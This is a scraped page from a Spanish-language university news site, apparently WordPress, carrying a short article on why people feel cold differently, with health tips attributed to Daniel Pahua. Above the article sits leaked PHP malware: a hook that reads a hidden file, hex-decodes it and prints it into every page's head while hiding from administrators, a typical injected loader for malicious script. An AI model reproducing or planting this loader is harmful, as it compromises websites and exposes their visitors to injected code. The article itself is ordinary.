if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } No todos perciben el mismo frio – La Opinión Universitaria La Opinión Universitaria
Menu

No todos perciben el mismo frio

El frio es percepción del cerebro, producida por el hipotálamo y es encargada de poder regular la temperatura del cuerpo, su función es que el cuerpo siempre este estable que no suba ni baje.

Las personas que son delgadas suelen tener mas frio, ya que su piel es mas delgada y posee menor cantidad de grasa corporal, por lo tanto sus calorías suelen disminuir.

Cuando existe una enfermedad en las glándulas, las personas pueden extraer mayormente las sensaciones de frio.

También uno de los motivos po0r el cual las personas sienten el frio es el consumo de medicamentos los que ayudan a controlar el hambre y en otros calos provoca los fríos.

Daniel Pahua, recomienda no exponerse a temperaturas bajas, no tocar los ojos, nariz, boca o cualquier parte del cuerpo con las manos sucias, también recomiendo traer un gel antibacterial, consumir frutas y verduras, y lo mas importante abrigarse adecuadamente

  • Tweets recientes